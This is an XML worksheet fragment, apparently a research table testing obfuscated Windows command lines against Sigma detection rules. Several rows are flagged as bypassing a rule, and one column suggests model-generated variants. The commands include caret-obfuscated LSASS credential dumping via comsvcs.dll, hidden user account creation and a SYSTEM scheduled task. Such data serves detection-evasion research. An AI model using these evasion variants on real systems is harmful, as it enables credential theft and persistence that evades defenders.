    <row r="5269" ht="15.75" customHeight="1" s="42"/>
    <row r="5270" ht="15.75" customHeight="1" s="42"/>
    <row r="5271" ht="15.75" customHeight="1" s="42"/>
    <row r="5272" ht="15.75" customHeight="1" s="42"/>
    <row r="5273" ht="15.75" customHeight="1" s="42"/>
    <row r="5274" ht="15.75" customHeight="1" s="42"/>
    <row r="5275" ht="15.75" customHeight="1" s="42"/>
    <row r="5276" ht="15.75" customHeight="1" s="42"/>
    <row r="5277" ht="15.75" customHeight="1" s="42"/>
    <row r="5278" ht="15.75" customHeight="1" s="42"/>
    <row r="5279" ht="15.75" customHeight="1" s="42"/>
    <row r="5280" ht="15.75" customHeight="1" s="42"/>
    <row r="5281" ht="15.75" customHeight="1" s="42"/>
    <row r="5282" ht="15.75" customHeight="1" s="42"/>
    <row r="5283" ht="15.75" customHeight="1" s="42"/>
    <row r="5284" ht="15.75" customHeight="1" s="42"/>
    <row r="5285" ht="15.75" customHeight="1" s="42"/>
    <row r="5286" ht="15.75" customHeight="1" s="42"/>
    <row r="5287" ht="15.75" customHeight="1" s="42"/>
    <row r="5288" ht="15.75" customHeight="1" s="42"/>
    <row r="5289" ht="15.75" customHeight="1" s="42"/>
    <row r="5290" ht="15.75" customHeight="1" s="42"/>
    <row r="5291" ht="15.75" customHeight="1" s="42"/>
    <row r="5292" ht="15.75" customHeight="1" s="42"/>
    <row r="5293" ht="15.75" customHeight="1" s="42"/>
    <row r="5294" ht="15.75" customHeight="1" s="42"/>
    <row r="5295" ht="15.75" customHeight="1" s="42"/>
    <row r="5296" ht="15.75" customHeight="1" s="42"/>
    <row r="5297" ht="15.75" customHeight="1" s="42"/>
    <row r="5298" ht="15.75" customHeight="1" s="42"/>
    <row r="5299" ht="15.75" customHeight="1" s="42"/>
    <row r="5300" ht="15.75" customHeight="1" s="42"/>
    <row r="5301" ht="15.75" customHeight="1" s="42"/>
    <row r="5302" ht="15.75" customHeight="1" s="42"/>
    <row r="5303" ht="15.75" customHeight="1" s="42"/>
    <row r="5304" ht="15.75" customHeight="1" s="42"/>
    <row r="5305" ht="15.75" customHeight="1" s="42"/>
    <row r="5306" ht="15.75" customHeight="1" s="42"/>
    <row r="5307" ht="15.75" customHeight="1" s="42"/>
    <row r="5308" ht="15.75" customHeight="1" s="42"/>
    <row r="5309" ht="15.75" customHeight="1" s="42"/>
    <row r="5310" ht="15.75" customHeight="1" s="42"/>
    <row r="5311" ht="15.75" customHeight="1" s="42"/>
    <row r="5312" ht="15.75" customHeight="1" s="42"/>
    <row r="5313" ht="15.75" customHeight="1" s="42"/>
    <row r="5314" ht="15.75" customHeight="1" s="42"/>
    <row r="5315" ht="15.75" customHeight="1" s="42"/>
    <row r="5316" ht="15.75" customHeight="1" s="42"/>
    <row r="5317" ht="15.75" customHeight="1" s="42"/>
    <row r="5318" ht="15.75" customHeight="1" s="42"/>
    <row r="5319" ht="15.75" customHeight="1" s="42"/>
    <row r="5320" ht="15.75" customHeight="1" s="42"/>
    <row r="5321" ht="15.75" customHeight="1" s="42"/>
    <row r="5322" ht="15.75" customHeight="1" s="42"/>
    <row r="5323" ht="15.75" customHeight="1" s="42"/>
    <row r="5324" ht="15.75" customHeight="1" s="42"/>
    <row r="5325" ht="15.75" customHeight="1" s="42"/>
    <row r="5326" ht="15.75" customHeight="1" s="42"/>
    <row r="5327" ht="15.75" customHeight="1" s="42"/>
    <row r="5328" ht="15.75" customHeight="1" s="42"/>
    <row r="5329" ht="15.75" customHeight="1" s="42"/>
    <row r="5330" ht="15.75" customHeight="1" s="42"/>
    <row r="5331" ht="15.75" customHeight="1" s="42"/>
    <row r="5332" ht="15.75" customHeight="1" s="42"/>
    <row r="5333" ht="15.75" customHeight="1" s="42"/>
    <row r="5334" ht="15.75" customHeight="1" s="42"/>
    <row r="5335" ht="15.75" customHeight="1" s="42"/>
    <row r="5336" ht="15.75" customHeight="1" s="42"/>
    <row r="5337" ht="15.75" customHeight="1" s="42"/>
    <row r="5338" ht="15.75" customHeight="1" s="42"/>
    <row r="5339" ht="15.75" customHeight="1" s="42"/>
    <row r="5340" ht="15.75" customHeight="1" s="42"/>
    <row r="5341" ht="15.75" customHeight="1" s="42"/>
    <row r="5342" ht="15.75" customHeight="1" s="42"/>
    <row r="5343" ht="15.75" customHeight="1" s="42"/>
    <row r="5344" ht="15.75" customHeight="1" s="42"/>
    <row r="5345" ht="15.75" customHeight="1" s="42"/>
    <row r="5346" ht="15.75" customHeight="1" s="42"/>
    <row r="5347" ht="15.75" customHeight="1" s="42"/>
    <row r="5348" ht="15.75" customHeight="1" s="42"/>
    <row r="5349" ht="15.75" customHeight="1" s="42"/>
    <row r="5350" ht="15.75" customHeight="1" s="42"/>
    <row r="5351" ht="15.75" customHeight="1" s="42"/>
    <row r="5352" ht="15.75" customHeight="1" s="42"/>
    <row r="5353" ht="15.75" customHeight="1" s="42"/>
    <row r="5354" ht="15.75" customHeight="1" s="42"/>
    <row r="5355" ht="15.75" customHeight="1" s="42"/>
    <row r="5356" ht="15.75" customHeight="1" s="42"/>
    <row r="5357" ht="15.75" customHeight="1" s="42"/>
    <row r="5358" ht="15.75" customHeight="1" s="42"/>
    <row r="5359" ht="15.75" customHeight="1" s="42"/>
    <row r="5360" ht="15.75" customHeight="1" s="42"/>
    <row r="5361" ht="15.75" customHeight="1" s="42"/>
    <row r="5362" ht="15.75" customHeight="1" s="42"/>
    <row r="5363" ht="15.75" customHeight="1" s="42"/>
    <row r="5364" ht="15.75" customHeight="1" s="42"/>
    <row r="5365" ht="15.75" customHeight="1" s="42"/>
    <row r="5366" ht="15.75" customHeight="1" s="42"/>
    <row r="5367" ht="15.75" customHeight="1" s="42"/>
    <row r="5368" ht="15.75" customHeight="1" s="42"/>
    <row r="5369" ht="15.75" customHeight="1" s="42"/>
    <row r="5370" ht="15.75" customHeight="1" s="42"/>
    <row r="5371" ht="15.75" customHeight="1" s="42"/>
    <row r="5372" ht="15.75" customHeight="1" s="42"/>
    <row r="5373" ht="15.75" customHeight="1" s="42"/>
    <row r="5374" ht="15.75" customHeight="1" s="42"/>
    <row r="5375" ht="15.75" customHeight="1" s="42"/>
    <row r="5376" ht="15.75" customHeight="1" s="42"/>
    <row r="5377" ht="15.75" customHeight="1" s="42"/>
    <row r="5378" ht="15.75" customHeight="1" s="42"/>
    <row r="5379" ht="15.75" customHeight="1" s="42"/>
    <row r="5380" ht="15.75" customHeight="1" s="42"/>
    <row r="5381" ht="15.75" customHeight="1" s="42"/>
    <row r="5382" ht="15.75" customHeight="1" s="42"/>
    <row r="5383" ht="15.75" customHeight="1" s="42"/>
    <row r="5384" ht="15.75" customHeight="1" s="42"/>
    <row r="5385" ht="15.75" customHeight="1" s="42"/>
    <row r="5386" ht="15.75" customHeight="1" s="42"/>
    <row r="5387" ht="15.75" customHeight="1" s="42"/>
    <row r="5388" ht="15.75" customHeight="1" s="42"/>
    <row r="5389" ht="15.75" customHeight="1" s="42"/>
    <row r="5390" ht="15.75" customHeight="1" s="42"/>
    <row r="5391" ht="15.75" customHeight="1" s="42"/>
    <row r="5392" ht="15.75" customHeight="1" s="42"/>
    <row r="5393" ht="15.75" customHeight="1" s="42"/>
    <row r="5394" ht="15.75" customHeight="1" s="42"/>
    <row r="5395" ht="15.75" customHeight="1" s="42"/>
    <row r="5396" ht="15.75" customHeight="1" s="42"/>
    <row r="5397" ht="15.75" customHeight="1" s="42"/>
    <row r="5398" ht="15.75" customHeight="1" s="42"/>
    <row r="5399" ht="15.75" customHeight="1" s="42"/>
    <row r="5400" ht="15.75" customHeight="1" s="42"/>
    <row r="5401" ht="15.75" customHeight="1" s="42"/>
    <row r="5402" ht="15.75" customHeight="1" s="42"/>
    <row r="5403" ht="15.75" customHeight="1" s="42"/>
    <row r="5404" ht="15.75" customHeight="1" s="42"/>
    <row r="5405" ht="15.75" customHeight="1" s="42"/>
    <row r="5406" ht="15.75" customHeight="1" s="42"/>
    <row r="5407" ht="15.75" customHeight="1" s="42"/>
    <row r="5408" ht="15.75" customHeight="1" s="42"/>
    <row r="5409" ht="15.75" customHeight="1" s="42"/>
    <row r="5410" ht="15.75" customHeight="1" s="42"/>
    <row r="5411" ht="15.75" customHeight="1" s="42"/>
    <row r="5412" ht="15.75" customHeight="1" s="42"/>
    <row r="5413" ht="15.75" customHeight="1" s="42"/>
    <row r="5414" ht="15.75" customHeight="1" s="42"/>
    <row r="5415" ht="15.75" customHeight="1" s="42"/>
    <row r="5416" ht="15.75" customHeight="1" s="42"/>
    <row r="5417" ht="15.75" customHeight="1" s="42"/>
    <row r="5418" ht="15.75" customHeight="1" s="42"/>
    <row r="5419" ht="15.75" customHeight="1" s="42"/>
    <row r="5420" ht="15.75" customHeight="1" s="42"/>
    <row r="5421" ht="15.75" customHeight="1" s="42"/>
    <row r="5422" ht="15.75" customHeight="1" s="42"/>
    <row r="5423" ht="15.75" customHeight="1" s="42"/>
    <row r="5424" ht="15.75" customHeight="1" s="42"/>
    <row r="5425" ht="15.75" customHeight="1" s="42"/>
    <row r="5426" ht="15.75" customHeight="1" s="42"/>
    <row r="5427" ht="15.75" customHeight="1" s="42"/>
    <row r="5428" ht="15.75" customHeight="1" s="42"/>
    <row r="5429" ht="15.75" customHeight="1" s="42"/>
    <row r="5430" ht="15.75" customHeight="1" s="42"/>
    <row r="5431" ht="15.75" customHeight="1" s="42"/>
    <row r="5432" ht="15.75" customHeight="1" s="42"/>
    <row r="5433" ht="15.75" customHeight="1" s="42"/>
    <row r="5434" ht="15.75" customHeight="1" s="42"/>
    <row r="5435" ht="15.75" customHeight="1" s="42"/>
    <row r="5436" ht="15.75" customHeight="1" s="42"/>
    <row r="5437" ht="15.75" customHeight="1" s="42"/>
    <row r="5438" ht="15.75" customHeight="1" s="42"/>
    <row r="5439" ht="15.75" customHeight="1" s="42"/>
    <row r="5440" ht="15.75" customHeight="1" s="42"/>
    <row r="5441" ht="15.75" customHeight="1" s="42"/>
    <row r="5442" ht="15.75" customHeight="1" s="42"/>
    <row r="5443" ht="15.75" customHeight="1" s="42"/>
    <row r="5444" ht="15.75" customHeight="1" s="42"/>
    <row r="5445" ht="15.75" customHeight="1" s="42"/>
    <row r="5446" ht="15.75" customHeight="1" s="42"/>
    <row r="5447" ht="15.75" customHeight="1" s="42"/>
    <row r="5448" ht="15.75" customHeight="1" s="42"/>
    <row r="5449" ht="15.75" customHeight="1" s="42"/>
    <row r="5450" ht="15.75" customHeight="1" s="42"/>
    <row r="5451" ht="15.75" customHeight="1" s="42"/>
    <row r="5452" ht="15.75" customHeight="1" s="42"/>
    <row r="5453" ht="15.75" customHeight="1" s="42"/>
    <row r="5454" ht="15.75" customHeight="1" s="42"/>
    <row r="5455" ht="15.75" customHeight="1" s="42"/>
    <row r="5456" ht="15.75" customHeight="1" s="42"/>
    <row r="5457" ht="15.75" customHeight="1" s="42"/>
    <row r="5458" ht="15.75" customHeight="1" s="42"/>
    <row r="5459" ht="15.75" customHeight="1" s="42"/>
    <row r="5460" ht="15.75" customHeight="1" s="42"/>
    <row r="5461" ht="15.75" customHeight="1" s="42"/>
    <row r="5462" ht="15.75" customHeight="1" s="42"/>
    <row r="5463" ht="15.75" customHeight="1" s="42"/>
    <row r="5464" ht="15.75" customHeight="1" s="42"/>
    <row r="5465" ht="15.75" customHeight="1" s="42"/>
    <row r="5466" ht="15.75" customHeight="1" s="42"/>
    <row r="5467" ht="15.75" customHeight="1" s="42"/>
    <row r="5468" ht="15.75" customHeight="1" s="42"/>
    <row r="5469" ht="15.75" customHeight="1" s="42"/>
    <row r="5470" ht="15.75" customHeight="1" s="42"/>
    <row r="5471" ht="15.75" customHeight="1" s="42"/>
    <row r="5472" ht="15.75" customHeight="1" s="42"/>
    <row r="5473" ht="15.75" customHeight="1" s="42"/>
    <row r="5474" ht="15.75" customHeight="1" s="42"/>
    <row r="5475" ht="15.75" customHeight="1" s="42"/>
    <row r="5476" ht="15.75" customHeight="1" s="42"/>
    <row r="5477" ht="15.75" customHeight="1" s="42"/>
    <row r="5478" ht="15.75" customHeight="1" s="42"/>
    <row r="5479" ht="15.75" customHeight="1" s="42"/>
    <row r="5480" ht="15.75" customHeight="1" s="42"/>
    <row r="5481" ht="15.75" customHeight="1" s="42"/>
    <row r="5482" ht="15.75" customHeight="1" s="42"/>
    <row r="5483" ht="15.75" customHeight="1" s="42"/>
    <row r="5484" ht="15.75" customHeight="1" s="42"/>
    <row r="5485" ht="15.75" customHeight="1" s="42"/>
    <row r="5486" ht="15.75" customHeight="1" s="42"/>
    <row r="5487" ht="15.75" customHeight="1" s="42"/>
    <row r="5488" ht="15.75" customHeight="1" s="42"/>
    <row r="5489" ht="15.75" customHeight="1" s="42"/>
    <row r="5490" ht="15.75" customHeight="1" s="42"/>
    <row r="5491" ht="15.75" customHeight="1" s="42"/>
    <row r="5492" ht="15.75" customHeight="1" s="42"/>
    <row r="5493" ht="15.75" customHeight="1" s="42"/>
    <row r="5494" ht="15.75" customHeight="1" s="42"/>
    <row r="5495" ht="15.75" customHeight="1" s="42"/>
    <row r="5496" ht="15.75" customHeight="1" s="42"/>
    <row r="5497" ht="15.75" customHeight="1" s="42"/>
    <row r="5498" ht="15.75" customHeight="1" s="42"/>
    <row r="5499" ht="15.75" customHeight="1" s="42"/>
    <row r="5500" ht="15.75" customHeight="1" s="42"/>
    <row r="5501" ht="15.75" customHeight="1" s="42"/>
    <row r="5502" ht="15.75" customHeight="1" s="42"/>
    <row r="5503" ht="15.75" customHeight="1" s="42"/>
    <row r="5504" ht="15.75" customHeight="1" s="42"/>
    <row r="5505" ht="15.75" customHeight="1" s="42"/>
    <row r="5506" ht="15.75" customHeight="1" s="42"/>
    <row r="5507" ht="15.75" customHeight="1" s="42"/>
    <row r="5508" ht="15.75" customHeight="1" s="42"/>
    <row r="5509" ht="15.75" customHeight="1" s="42"/>
    <row r="5510" ht="15.75" customHeight="1" s="42"/>
    <row r="5511" ht="15.75" customHeight="1" s="42"/>
    <row r="5512" ht="15.75" customHeight="1" s="42"/>
    <row r="5513" ht="15.75" customHeight="1" s="42"/>
    <row r="5514" ht="15.75" customHeight="1" s="42"/>
    <row r="5515" ht="15.75" customHeight="1" s="42"/>
    <row r="5516" ht="15.75" customHeight="1" s="42"/>
    <row r="5517" ht="15.75" customHeight="1" s="42"/>
    <row r="5518" ht="15.75" customHeight="1" s="42"/>
    <row r="5519" ht="15.75" customHeight="1" s="42"/>
    <row r="5520" ht="15.75" customHeight="1" s="42"/>
    <row r="5521" ht="15.75" customHeight="1" s="42"/>
    <row r="5522" ht="15.75" customHeight="1" s="42"/>
    <row r="5523" ht="15.75" customHeight="1" s="42"/>
    <row r="5524" ht="15.75" customHeight="1" s="42"/>
    <row r="5525" ht="15.75" customHeight="1" s="42"/>
    <row r="5526" ht="15.75" customHeight="1" s="42"/>
    <row r="5527" ht="15.75" customHeight="1" s="42"/>
    <row r="5528" ht="15.75" customHeight="1" s="42"/>
    <row r="5529" ht="15.75" customHeight="1" s="42"/>
    <row r="5530" ht="15.75" customHeight="1" s="42"/>
    <row r="5531" ht="15.75" customHeight="1" s="42"/>
    <row r="5532" ht="15.75" customHeight="1" s="42"/>
    <row r="5533" ht="15.75" customHeight="1" s="42"/>
    <row r="5534" ht="15.75" customHeight="1" s="42"/>
    <row r="5535" ht="15.75" customHeight="1" s="42"/>
    <row r="5536" ht="15.75" customHeight="1" s="42"/>
    <row r="5537" ht="15.75" customHeight="1" s="42"/>
    <row r="5538" ht="15.75" customHeight="1" s="42"/>
    <row r="5539" ht="15.75" customHeight="1" s="42"/>
    <row r="5540" ht="15.75" customHeight="1" s="42"/>
    <row r="5541" ht="15.75" customHeight="1" s="42"/>
    <row r="5542" ht="15.75" customHeight="1" s="42"/>
    <row r="5543" ht="15.75" customHeight="1" s="42"/>
    <row r="5544" ht="15.75" customHeight="1" s="42"/>
    <row r="5545" ht="15.75" customHeight="1" s="42"/>
    <row r="5546" ht="15.75" customHeight="1" s="42"/>
    <row r="5547" ht="15.75" customHeight="1" s="42"/>
    <row r="5548" ht="15.75" customHeight="1" s="42"/>
    <row r="5549" ht="15.75" customHeight="1" s="42"/>
    <row r="5550" ht="15.75" customHeight="1" s="42"/>
    <row r="5551" ht="15.75" customHeight="1" s="42"/>
    <row r="5552" ht="15.75" customHeight="1" s="42"/>
    <row r="5553" ht="15.75" customHeight="1" s="42"/>
    <row r="5554" ht="15.75" customHeight="1" s="42"/>
    <row r="5555" ht="15.75" customHeight="1" s="42"/>
    <row r="5556" ht="15.75" customHeight="1" s="42"/>
    <row r="5557" ht="15.75" customHeight="1" s="42"/>
    <row r="5558" ht="15.75" customHeight="1" s="42"/>
    <row r="5559" ht="15.75" customHeight="1" s="42"/>
    <row r="5560" ht="15.75" customHeight="1" s="42"/>
    <row r="5561" ht="15.75" customHeight="1" s="42"/>
    <row r="5562" ht="15.75" customHeight="1" s="42"/>
    <row r="5563" ht="15.75" customHeight="1" s="42"/>
    <row r="5564" ht="15.75" customHeight="1" s="42"/>
    <row r="5565" ht="15.75" customHeight="1" s="42"/>
    <row r="5566" ht="15.75" customHeight="1" s="42"/>
    <row r="5567" ht="15.75" customHeight="1" s="42"/>
    <row r="5568" ht="15.75" customHeight="1" s="42"/>
    <row r="5569" ht="15.75" customHeight="1" s="42"/>
    <row r="5570" ht="15.75" customHeight="1" s="42"/>
    <row r="5571" ht="15.75" customHeight="1" s="42"/>
    <row r="5572" ht="15.75" customHeight="1" s="42"/>
    <row r="5573" ht="15.75" customHeight="1" s="42"/>
    <row r="5574" ht="15.75" customHeight="1" s="42"/>
    <row r="5575" ht="15.75" customHeight="1" s="42"/>
    <row r="5576" ht="15.75" customHeight="1" s="42"/>
    <row r="5577" ht="15.75" customHeight="1" s="42"/>
    <row r="5578" ht="15.75" customHeight="1" s="42"/>
    <row r="5579" ht="15.75" customHeight="1" s="42"/>
    <row r="5580" ht="15.75" customHeight="1" s="42"/>
    <row r="5581" ht="15.75" customHeight="1" s="42"/>
    <row r="5582" ht="15.75" customHeight="1" s="42"/>
    <row r="5583" ht="15.75" customHeight="1" s="42"/>
    <row r="5584" ht="15.75" customHeight="1" s="42"/>
    <row r="5585" ht="15.75" customHeight="1" s="42"/>
    <row r="5586" ht="15.75" customHeight="1" s="42"/>
    <row r="5587" ht="15.75" customHeight="1" s="42"/>
    <row r="5588" ht="15.75" customHeight="1" s="42"/>
    <row r="5589" ht="15.75" customHeight="1" s="42"/>
    <row r="5590" ht="15.75" customHeight="1" s="42"/>
    <row r="5591" ht="15.75" customHeight="1" s="42"/>
    <row r="5592" ht="15.75" customHeight="1" s="42"/>
    <row r="5593" ht="15.75" customHeight="1" s="42"/>
    <row r="5594" ht="15.75" customHeight="1" s="42"/>
    <row r="5595" ht="15.75" customHeight="1" s="42"/>
    <row r="5596" ht="15.75" customHeight="1" s="42"/>
    <row r="5597" ht="15.75" customHeight="1" s="42"/>
    <row r="5598" ht="15.75" customHeight="1" s="42"/>
    <row r="5599" ht="15.75" customHeight="1" s="42"/>
    <row r="5600" ht="15.75" customHeight="1" s="42"/>
    <row r="5601" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K4796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42" min="1" max="1"/>
    <col width="59.14" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="35" t="inlineStr">
        <is>
          <t>Technical</t>
        </is>
      </c>
      <c r="B1" s="35" t="inlineStr">
        <is>
          <t>Rule_name</t>
        </is>
      </c>
      <c r="C1" s="35" t="inlineStr">
        <is>
          <t>Title</t>
        </is>
      </c>
      <c r="D1" s="35" t="inlineStr">
        <is>
          <t>Rule_id</t>
        </is>
      </c>
      <c r="E1" s="35" t="inlineStr">
        <is>
          <t>Commandline_evasion</t>
        </is>
      </c>
      <c r="F1" s="35" t="inlineStr">
        <is>
          <t>Excutable</t>
        </is>
      </c>
      <c r="G1" s="35" t="inlineStr">
        <is>
          <t>Bypass target rule</t>
        </is>
      </c>
      <c r="H1" s="35" t="inlineStr">
        <is>
          <t>Bypass all rule</t>
        </is>
      </c>
      <c r="I1" s="35" t="inlineStr">
        <is>
          <t>Trigger rule</t>
        </is>
      </c>
      <c r="J1" s="35" t="inlineStr">
        <is>
          <t>LLM</t>
        </is>
      </c>
      <c r="K1" s="35" t="inlineStr">
        <is>
          <t>behavior</t>
        </is>
      </c>
    </row>
    <row r="2" hidden="1" s="42">
      <c r="A2" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B2" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C2" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D2" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E2" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" hidden="1" s="42">
      <c r="A3" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B3" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C3" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D3" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E3" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K3" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" hidden="1" s="42">
      <c r="A4" s="36" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B4" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C4" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D4" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E4" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F4" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G4" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" hidden="1" s="42">
      <c r="A5" s="43" t="n"/>
      <c r="B5" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C5" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D5" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E5" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F5" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G5" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I5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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" hidden="1" s="42">
      <c r="A6" s="43" t="n"/>
      <c r="B6" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C6" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D6" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E6" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F6" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G6" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I6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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" hidden="1" s="42">
      <c r="A7" s="43" t="n"/>
      <c r="B7" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C7" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D7" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E7" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F7" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G7" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" hidden="1" s="42">
      <c r="A8" s="43" t="n"/>
      <c r="B8" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C8" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D8" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E8" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F8" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G8" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" hidden="1" s="42">
      <c r="A9" s="43" t="n"/>
      <c r="B9" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C9" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D9" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E9" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F9" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" hidden="1" s="42">
      <c r="A10" s="43" t="n"/>
      <c r="B10" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C10" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D10" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E10" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="36" t="n">
        <v>0</v>
      </c>
